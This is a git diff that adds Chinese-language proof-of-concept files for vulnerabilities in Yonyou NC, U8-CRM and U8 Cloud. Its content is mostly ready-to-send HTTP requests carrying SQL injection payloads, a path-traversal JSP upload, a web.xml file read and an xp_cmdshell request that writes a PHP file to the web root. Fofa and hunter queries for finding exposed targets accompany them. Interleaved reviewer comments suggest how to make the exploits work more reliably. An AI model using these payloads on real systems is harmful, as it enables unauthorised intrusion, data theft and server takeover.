@@ -0,0 +1,28 @@ +# 用友NC-cartabletimeline存在SQL注入漏洞 + +## fofa + +```yaml +app="用友-UFIDA-NC" +``` + +## poc + +```javascript +GET /portal/pt/cartabletimeline/doList?pageId=login&mtr=1)WAITFOR+DELAY+%270:0:2%27--+ HTTP/1.1 +Host: ip:port +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Priority: u=4 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280915472.png) + + + +## 漏洞来源 + +- https://forum.butian.net/article/627 diff --git a/用友NC-process存在SQL注入漏洞.md b/用友NC-process存在SQL注入漏洞.md new file mode 100644 index 0000000..7285bb0 --- /dev/null +++ b/用友NC-process存在SQL注入漏洞.md @@ -0,0 +1,27 @@ +# 用友NC-process存在SQL注入漏洞 + +用友NC /portal/pt/task/process 接口存在SQL注入漏洞,攻击者通过利用SQL注入漏洞配合数据库xp_cmdshell可以执行任意命令,从而控制服务器。经过分析与研判,该漏洞利用难度低,建议尽快修复。 + +## fofa + +```javascript +icon_hash="1085941792" +``` + + +## poc + +```javascript +POST /portal/pt/task/process?pageId=login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Connection: close +Content-Type: application/x-www-form-urlencoded + +id=1&oracle=1&pluginid=1%27%20AND%207194%3D%28SELECT%20UPPER%28XMLType%28CHR%2860%29%7C%7CCHR%2858%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2898%29%7C%7CCHR%2898%29%7C%7CCHR%28113%29%7C%7C%28SELECT%20%28CASE%20WHEN%20%287194%3D7194%29%20THEN%201%20ELSE%200%20END%29%20FROM%20DUAL%29%7C%7CCHR%28113%29%7C%7CCHR%28120%29%7C%7CCHR%28120%29%7C%7CCHR%28113%29%7C%7CCHR%28113%29%7C%7CCHR%2862%29%29%29%20FROM%20DUAL%29--%20dJyN +``` + +![image-20241128091833680](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280918769.png) 
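Review bot: the 用友NC-process hunk says the injection can be chained with `xp_cmdshell`, an MSSQL feature, but the poc body is Oracle-only (`XMLType`, `FROM DUAL`, `CHR(...)` joined with `||`); either add the MSSQL variant or reword the description so it does not promise a capability the payload cannot show. The cartabletimeline hunk uses the MSSQL form `mtr=1)WAITFOR+DELAY+'0:0:2'--+` and has no description at all; add the one-line summary and the expected two-second delay, and replace `Host: ip:port` with the blank `Host:` used elsewhere in the patch.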
diff --git a/用友NC-word.docx任意文件读取漏洞.md b/用友NC-word.docx任意文件读取漏洞.md new file mode 100644 index 0000000..ee8d51c --- /dev/null +++ b/用友NC-word.docx任意文件读取漏洞.md @@ -0,0 +1,20 @@ + +## 用友NC word.docx任意文件读取漏洞 + +## fofa +``` +body="UClient.dmg" +``` + +## poc +``` +GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1) +Accept: */* +Connection: Keep-Alive + +``` + +## 漏洞复现 +![0152cd5a2d208fb2e336de5ac3621ebb](https://github.com/wy876/POC/assets/139549762/05dcd3bf-a6ae-4aac-95ca-e6788e2eadb0) diff --git a/用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md b/用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md new file mode 100644 index 0000000..4bb0d79 --- /dev/null +++ b/用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013).md 
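Review bot: this file and 用友NC系统word.docx存在信息泄露漏洞.md later in the same patch describe the same request, `GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml`; merge them, keeping the clean request from this one and the `app="用友-UFIDA-NC"` fofa query from the other (`body="UClient.dmg"` here is a much looser fingerprint). Also state that `disp` is the file path parameter, which is what justifies the `任意文件读取` in the title beyond the single `web.xml` example.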
@@ -0,0 +1,30 @@ +# 用友NC接口checkekey存在SQL注入漏洞(XVE-2024-37013) + +用友NC中checkekey存在SQL注入漏洞,攻击者可以利用 SQL 注入漏洞获取数据库中的信息。 + +## fofa + +```javascript +app="用友-UFIDA-NC" +``` + +## poc + +```javascript +POST /portal/pt/office/checkekey?pageId=login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Connection: close + +user=1' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(112)||CHR(122)||CHR(113)||CHR(80)||CHR(103)||CHR(106)||CHR(122)||CHR(81)||CHR(70)||CHR(74)||CHR(104)||CHR(106)||CHR(107)||CHR(100)||CHR(74)||CHR(105)||CHR(114)||CHR(88)||CHR(73)||CHR(112)||CHR(81)||CHR(101)||CHR(119)||CHR(116)||CHR(79)||CHR(71)||CHR(78)||CHR(115)||CHR(65)||CHR(111)||CHR(70)||CHR(103)||CHR(85)||CHR(71)||CHR(83)||CHR(101)||CHR(65)||CHR(71)||CHR(90)||CHR(114)||CHR(87)||CHR(78)||CHR(107)||CHR(113)||CHR(106)||CHR(98)||CHR(112)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- twnX&ekey=1 +``` + +![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202501122254942.webp) + +## 漏洞来源 + +- https://mp.weixin.qq.com/s?__biz=MzkyNDY3MTY3MA==&mid=2247486717&idx=1&sn=09d465455794e1d55e13f2b10565a7ab \ No newline at end of file diff --git a/用友NC接口download存在SQL注入漏洞.md b/用友NC接口download存在SQL注入漏洞.md new file mode 100644 index 0000000..6a30e88 --- /dev/null +++ b/用友NC接口download存在SQL注入漏洞.md @@ -0,0 +1,15 @@ +# 用友NC接口download存在SQL注入漏洞 + + +## fofa + +```yaml +app="用友-UFIDA-NC" +``` + +## poc + +```java +http://ip/portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ +``` + diff --git a/用友NC系统FileManager接口存在任意文件上传漏洞.md b/用友NC系统FileManager接口存在任意文件上传漏洞.md new file mode 100644 index 0000000..b4404b5 --- /dev/null +++ b/用友NC系统FileManager接口存在任意文件上传漏洞.md 
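Review bot: in the checkekey hunk the body `user=1' UNION ALL SELECT NULL,CHR(113)||CHR(113)||CHR(112)||...||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL-- twnX&ekey=1` is sent with raw spaces and quotes under `application/x-www-form-urlencoded` and without `Content-Length`; URL-encode it or say the tool will. The marker the `CHR()` chain builds starts with `qqpzq` and ends with `qjbpq`; put that indicator in the text.

Review bot: the download hunk is only a URL, `.../portal/pt/psnImage/download?pageId=login&pk_psndoc=1%27)%20AND%206322=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65)||CHR(79)||CHR(66)||CHR(101),5)%20AND%20(%27rASZ%27=%27rASZ`, with no description, request or indicator; add the one-line summary used in the sibling files, say that the five-second delay (the `5` argument of `DBMS_PIPE.RECEIVE_MESSAGE`) is the signal, and note that the payload is Oracle-only.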
@@ -0,0 +1,25 @@ +# 用友NC系统FileManager接口存在任意文件上传漏洞 + +NC系统可利用/portal/pt/file/upload 接口中的 filename 参数及 billitem 参数实现任意文件上传,从而控制服务器 + +## fofa + +```yaml +app="用友-UFIDA-NC" +``` + +## poc + +```java +POST /portal/pt/file/upload?pageId=login&filemanager=nc.uap.lfw.file.FileManager&iscover=true&billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C HTTP/1.1 +Host: +Content-Type: multipart/form-data;boundary=d0b7a0d40eed0e32904c8017b09eb305 + +--d0b7a0d40eed0e32904c8017b09eb305 +Content-Disposition: form-data; name="file"; filename="we.jsp" +Content-Type: text/plain + +<%out.print("hello world");%> +--d0b7a0d40eed0e32904c8017b09eb305-- +``` + diff --git a/用友NC系统word.docx存在信息泄露漏洞.md b/用友NC系统word.docx存在信息泄露漏洞.md new file mode 100644 index 0000000..7708d8c --- /dev/null +++ b/用友NC系统word.docx存在信息泄露漏洞.md @@ -0,0 +1,28 @@ +# 用友NC系统word.docx存在信息泄露漏洞 + +用友NC系统word.docx存在信息泄露漏洞 + +## fofa + +```javascript +app="用友-UFIDA-NC" +``` + +## poc + +```javascript +GET /portal/docctr/open/word.docx?disp=/WEB-INF/web.xml HTTP/1.1 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cache-Control: max-age=0 +Connection: keep-alive +Cookie: JSESSIONID=722CE6F799BBDE1ED1AFA8DC032B06C0.ncServer; JSESSIONID=6BDD75C8E88EE19ED89FF84865C74059.ncServer +Host: +If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT +If-None-Match: W/"15737-1546825364907" +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36 +``` + +![image-20241017142208558](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202410171422653.png) \ No newline at end of file diff --git a/用友NC系统接口yerfile_down存在SQL注入漏洞.md b/用友NC系统接口yerfile_down存在SQL注入漏洞.md new file mode 100644 index 0000000..0b59573 --- /dev/null +++ b/用友NC系统接口yerfile_down存在SQL注入漏洞.md 
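Review bot: the FileManager upload's `billitem=..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5C..%5Cwebapps%5Cnc_web%5C` uses backslash separators and a `webapps\nc_web\` target, so it is written for Windows deployments; say so, and either add the `%2F` variant for Linux hosts or state that it was not tested there. There is also no verification step for the uploaded `we.jsp` (expected output `hello world`), which the other upload files in this patch provide.

Review bot: the word.docx 信息泄露 request carries `If-Modified-Since: Mon, 07 Jan 2019 01:42:44 GMT` and `If-None-Match: W/"15737-1546825364907"` from the capture; a server that honours them may answer `304 Not Modified` with an empty body and the PoC will look like a miss, so strip them together with the doubled `Cookie: JSESSIONID=...; JSESSIONID=...` line. This hunk also duplicates 用友NC-word.docx任意文件读取漏洞.md (same path and `disp=/WEB-INF/web.xml`); keep one.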
@@ -0,0 +1,25 @@ +# 用友NC系统接口yerfile_down存在SQL注入漏洞 +用友NC是用友网络科技股份有限公司研发的一款大型erp企业管理系统与电子商务平台。 用友NC yerfile存在SQL注入漏洞 + +## fofa + +```javascript +app="用友-UFIDA-NC" +``` + +### 四、漏洞复现 +```javascript +POST /portal/pt/yerfile/down/bill?pageId=login HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0 +Accept: */* +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Connection: close + +id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),6)-- +``` + + + diff --git a/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md b/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md new file mode 100644 index 0000000..72af90f --- /dev/null +++ b/用友U8+CRM系统leadconversion.php存在SQL注入漏洞.md @@ -0,0 +1,32 @@ +# 用友U8+CRM系统leadconversion.php存在SQL注入漏洞 + +用友U8+CRM系统leadconversion.php存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## fofa + +```javascript +title="用友U8CRM" +``` + +## hunter + +```javascript +app.name="用友 CRM" +``` + +## poc + +```javascript +POST /lead/leadconversion.php HTTP/1.1 +Upgrade-Insecure-Requests: 1 +Cookie: PHPSESSID=bgsesstimeout-; +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6 +Connection: close +Content-Type: application/x-www-form-urlencoded +Content-Length: 75 + +DontCheckLogin=1&Action=getDeptName&userid=1%27;WAITFOR+DELAY+%270:0:5%27-- +``` + diff --git a/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md b/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md new file mode 100644 index 0000000..f6b89da --- /dev/null +++ b/用友U8-CRM接口exportdictionary.php存在SQL注入漏洞.md 
@@ -0,0 +1,23 @@ +# 用友U8-CRM接口exportdictionary.php存在SQL注入漏洞 + +用友U8-CRM接口 /devtools/tools/exportdictionary.ph p存在SQL注入漏洞 + +## hunter + +```yaml +app.name="用友 CRM" +``` + +## poc + +```java +GET /devtools/tools/exportdictionary.php?DontCheckLogin=1&value=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +X-Requested-With: XMLHttpRequest +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; TL_EXPANDED=REL_STAGE2012 +``` + diff --git a/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md b/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md new file mode 100644 index 0000000..3a462c9 --- /dev/null +++ b/用友U8-CRM接口rellistname.php存在SQL注入漏洞.md @@ -0,0 +1,19 @@ +# 用友U8-CRM接口rellistname.php存在SQL注入漏洞 + +用友U8+CRM /config/rellistname.php 文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句。 + +## fofa + +```javascript +body="用友U8CRM" || body="/js/tfunction.js" || title="用友U8CRM" +``` + +## poc + +```javascript +GET /config/rellistname.php?DontCheckLogin=1&objType=1&reportID=1+wAiTFOR+DeLAy'0:0:4'--+- HTTP/1.1 +Host: +Cookie: PHPSESSID=bgsesstimeout-; +``` + +![image-20241206230326146](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062303231.png) \ No newline at end of file diff --git a/用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md b/用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md new file mode 100644 index 0000000..73a0805 --- /dev/null +++ b/用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞.md 
@@ -0,0 +1,77 @@ +# 用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞 + +用友U8-CRM系统ajaxgetborrowdata.php存在SQL注入漏洞,文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## hunter + +```jade +app.name="用友 CRM" +``` + +## fofa + +```jade +title="用友U8CRM" +``` + +## poc + +```javascript +POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getWarehouseOtherInfo HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +cWhCode=1%27+UNION+ALL+SELECT+CHAR%28113%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28106%29%2BCHAR%28113%29%2BCHAR%2899%29%2BCHAR%28105%29%2BCHAR%28114%29%2BCHAR%2887%29%2BCHAR%28120%29%2BCHAR%2874%29%2BCHAR%2866%29%2BCHAR%28106%29%2BCHAR%2885%29%2BCHAR%2898%29%2BCHAR%2886%29%2BCHAR%2874%29%2BCHAR%2875%29%2BCHAR%2868%29%2BCHAR%28108%29%2BCHAR%2899%29%2BCHAR%28114%29%2BCHAR%2890%29%2BCHAR%2867%29%2BCHAR%2874%29%2BCHAR%28114%29%2BCHAR%2873%29%2BCHAR%2876%29%2BCHAR%2877%29%2BCHAR%28101%29%2BCHAR%2870%29%2BCHAR%28122%29%2BCHAR%2888%29%2BCHAR%2886%29%2BCHAR%28103%29%2BCHAR%2881%29%2BCHAR%2899%29%2BCHAR%28107%29%2BCHAR%2865%29%2BCHAR%2868%29%2BCHAR%2867%29%2BCHAR%2885%29%2BCHAR%2876%29%2BCHAR%2879%29%2BCHAR%28122%29%2BCHAR%28113%29%2BCHAR%28120%29%2BCHAR%28122%29%2BCHAR%2898%29%2BCHAR%28113%29--+KRVC +``` + +```javascript +POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getInvOtherInfo HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + 
+cInvCode=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27-- +``` + +```javascript +POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getCusInfo HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +cus=1%27%3BWAITFOR+DELAY+%270%3A0%3A6%27-- +``` + +```javascript +POST /borrowout/ajaxgetborrowdata.php?DontCheckLogin=1&Action=getCusPrice HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +i=-99%27%3BWAITFOR+DELAY+%270%3A0%3A3%27-- +``` + +![image-20241128092450453](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280924536.png) + +![image-20241128092503553](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280925626.png) \ No newline at end of file diff --git a/用友U8-CRM系统chkService.php存在SQL注入漏洞.md b/用友U8-CRM系统chkService.php存在SQL注入漏洞.md new file mode 100644 index 0000000..a1bab1d --- /dev/null +++ b/用友U8-CRM系统chkService.php存在SQL注入漏洞.md 
@@ -0,0 +1,29 @@ +## 用友U8-CRM系统chkService.php存在SQL注入漏洞 + +用友U8-CRM系统 /ajax/chkService.php 文件存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## hunter + +```jade +app.name="用友 CRM" +``` + +## fofa + +```jade +title="用友U8CRM" +``` + +## poc + +```javascript +GET /ajax/chkService.php?Action=chkAccountNumExists&accountNum=1%27;WAITFOR+DELAY+%270:0:5%27-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:127.0) Gecko/20100101 Firefox/127.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 +Cookie: PHPSESSID=bgsesstimeout-; +Connection: close +``` + diff --git a/用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md b/用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md new file mode 100644 index 0000000..5209835 --- /dev/null +++ b/用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞.md 
@@ -0,0 +1,43 @@ +# 用友U8-CRM系统fillbacksetting.php存在SQL注入漏洞 + +用友U8-CRM系统 `/config/fillbacksetting.php` 存在SQL注入漏洞,允许攻击者通过恶意构造的SQL语句操控数据库,从而导致数据泄露、篡改或破坏,严重威胁系统安全。 + +## hunter + +```jade +app.name="用友 CRM" +``` + +## fofa + +```jade +title="用友U8CRM" +``` + +## poc + +```javascript +GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:5'-- HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Connection: close +``` + +```javascript +GET /config/fillbacksettingedit.php?DontCheckLogin=1&action=edit&id=1+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,@@VERSION,NULL,NULL--+ HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate, br +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Connection: close +``` + +![image-20240927200752980](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272007101.png) + +![image-20240927200857642](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202409272008790.png) diff --git a/用友U8-CRM系统getDeptName存在SQL注入漏洞.md b/用友U8-CRM系统getDeptName存在SQL注入漏洞.md new file mode 100644 index 0000000..5d4668b --- /dev/null +++ b/用友U8-CRM系统getDeptName存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +## 用友U8-CRM系统getDeptName存在SQL注入漏洞 + +用友U8+CRM系统getDeptName存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## hunter + +```jade +app.name="用友 CRM" +``` + +## fofa + +```jade +title="用友U8CRM" +``` + +## poc + +```javascript +POST /lead/leadconversion.php?DontCheckLogin=1&Action=getDeptName HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +userid=1%27;WAITFOR+DELAY+%270:0:5%27-- +``` + +![image-20241206220645156](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202412062206241.png) \ No newline at end of file diff --git a/用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md b/用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md new file mode 100644 index 0000000..6ab9546 --- /dev/null +++ b/用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞.md 
@@ -0,0 +1,33 @@ +# 用友U8-CRM系统getufvouchdata.php存在SQL注入漏洞 + +用友U8-CRM ajax/getufvouchdata.php 文件多个方法存在SQL注入漏洞,未经身份验证的攻击者通过漏洞执行任意SQL语句,调用xp_cmdshell写入后门文件,执行任意代码,从而获取到服务器权限。 + +## hunter + +```jade +app.name="用友 CRM" +``` + +## fofa + +```jade +title="用友U8CRM" +``` + +## poc + +```javascript +POST /ajax/getufvouchdata.php?DontCheckLogin=1&Action=getRelations HTTP/1.1 +Host: +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Accept: */* +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: PHPSESSID=bgsesstimeout-; +Content-Type: application/x-www-form-urlencoded; charset=utf-8 +Connection: close + +pID=1%27%20UNION%20ALL%20SELECT%20CHAR%28113%29%2BCHAR%28118%29%2BCHAR%28120%29%2BCHAR%28112%29%2BCHAR%28113%29%2BCHAR%28104%29%2BCHAR%2867%29%2BCHAR%2871%29%2BCHAR%28117%29%2BCHAR%2866%29%2BCHAR%28115%29%2BCHAR%2882%29%2BCHAR%2879%29%2BCHAR%28112%29%2BCHAR%28109%29%2BCHAR%2897%29%2BCHAR%2869%29%2BCHAR%2880%29%2BCHAR%2880%29%2BCHAR%28104%29%2BCHAR%2872%29%2BCHAR%2877%29%2BCHAR%2886%29%2BCHAR%2866%29%2BCHAR%2865%29%2BCHAR%28118%29%2BCHAR%2889%29%2BCHAR%28101%29%2BCHAR%28104%29%2BCHAR%28106%29%2BCHAR%28121%29%2BCHAR%2880%29%2BCHAR%2879%29%2BCHAR%28121%29%2BCHAR%28100%29%2BCHAR%2868%29%2BCHAR%2868%29%2BCHAR%28117%29%2BCHAR%2876%29%2BCHAR%28122%29%2BCHAR%28110%29%2BCHAR%2872%29%2BCHAR%28109%29%2BCHAR%2876%29%2BCHAR%2871%29%2BCHAR%28113%29%2BCHAR%28118%29%2BCHAR%28122%29%2BCHAR%28112%29%2BCHAR%28113%29--%20uSHu&cID=1 +``` + +![image-20241128092143696](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202411280921776.png) \ No newline at end of file diff --git a/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md b/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md new file mode 100644 index 0000000..f3b950f --- /dev/null +++ b/用友U8-CRM系统接口attrlist存在SQL注入漏洞.md 
@@ -0,0 +1,22 @@ +# 用友U8-CRM系统接口attrlist存在SQL注入漏洞 + + + +## hunter + +```yaml +app.name="用友 CRM" +``` + +## poc + +```java +POST /devtools/tools/attrlist.php?DontCheckLogin=1&isquery=1 HTTP/1.1 +Host: +Connection: close +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 +Content-Type: application/x-www-form-urlencoded; + +obj_type=1';WAITFOR DELAY '0:0:5'-- +``` + diff --git a/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md b/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md new file mode 100644 index 0000000..5bac6c3 --- /dev/null +++ b/用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞.md @@ -0,0 +1,17 @@ +# 用友U8-CRM系统接口reservationcomplete.php存在SQL注入漏洞 + +用友U8-CRM系统接口 /bgt/reservationcomplete.php 存在SQL注入漏洞 + +## hunter + +```yaml +app.name="用友 CRM" +``` + +## poc + +```java +GET /bgt/reservationcomplete.php?DontCheckLogin=1&ID=1112;exec%20master..xp_cmdshell%20%27echo%20^%3C?php%20echo%20hello;?^%3E%20%3E%20D:\U8SOFT\turbocrm70\code\www\hello.php%27; HTTP/1.1 +Host: +``` + diff --git a/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md b/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md new file mode 100644 index 0000000..8dd2991 --- /dev/null +++ b/用友U8-Cloud-ArchiveVerify存在SQL注入漏洞.md @@ -0,0 +1,12 @@ +## 用友U8 Cloud-ArchiveVerify存在SQL注入漏洞 + + +## poc +``` +POST /u8cuapws/rest/archive/verify HTTP/1.1 +Host: your-ip +User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 +Content-Type: application/x-www-form-urlencoded + +{"orgInfo":{"code":"1';WAITFOR DELAY '0:0:5'--"}} +``` diff --git a/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md b/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md new file mode 100644 index 0000000..b8dc46e --- /dev/null +++ b/用友U8-Cloud-KeyWordReportQuery存在SQL注入漏洞.md 
